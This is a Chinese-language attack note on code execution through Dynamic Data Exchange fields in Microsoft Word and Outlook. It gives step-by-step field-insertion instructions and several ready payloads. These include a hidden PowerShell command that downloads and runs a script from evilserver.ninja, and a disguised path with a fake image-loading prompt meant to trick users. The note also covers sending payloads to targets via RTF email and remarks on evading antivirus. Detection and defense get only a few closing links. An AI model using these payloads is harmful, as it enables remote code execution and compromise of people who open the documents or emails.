MS Office Dynamic Data Exchange Code Exec

步骤

Insert tab -> Quick Parts -> Field

中文版：插入 -> 文档部件 -> 域

选择= (Formula) ：

选择文字右键Toggle Field Codes（切换域代码）：

替换内容为：

{DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe"  }

注：第一部分DDEAUTO是DDE字段提示，第二部分c:\\windows\\system32\\cmd.exe为可执行文件的路径，第三部分calc.exe为执行命令参数。

另外还可以直接使用快捷键CTRL+F9创建一个空白的字段标识符然后直接插入DDE代码保存即可。

打开后效果如图：

PoC

Empire Payload：

{ DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://evilserver.ninja/pp.ps1');powershell -e $e "}

Demo：

dde.mp4

使用DDE标识也可以：

{DDE "c:\\windows\\system32\\cmd.exe" "/c notepad" }

当然还可以通过社工的手段来欺骗用户：

{DDEAUTO "C:\\Programs\\Microsoft\\Office\\MSWord.exe\\..\\..\\..\\..\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -NoP -sta -w hidden -NonI -c IEX(New-Object System.Net.WebClient).DownloadString('http://test.com/c.ps1');c.ps1" "图片无法加载"}

免杀效果：

禁用宏之后用利用DDE还可以执行PowerShell,,瑞星牛逼了...

OutLook

OutLook2013:

新建邮件-选择RTF格式-从Word中拷贝DDE payload进入邮件-然后发送给目标用户-用户点击回复邮件-利用成功

OutLook2016: 需要在新建邮件里先添加一个图片，其他步骤同上

检测

YARA规则：

• https://blog.nviso.be/2017/10/11/detecting-dde-in-ms-office-documents/

恶意样本

• http://contagiodump.blogspot.com/2017/10/dde-command-execution-malware-samples.html

防御

修改Windows注册表在MS Office中关闭DDE：

• https://gist.github.com/wdormann/732bb88d9b5dd5a66c9f1e1498f31a1b

参考

• https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/
• https://twitter.com/GossiTheDog/status/920635876375449600
• https://mobile.twitter.com/HelpDeskMan/status/920757979401605122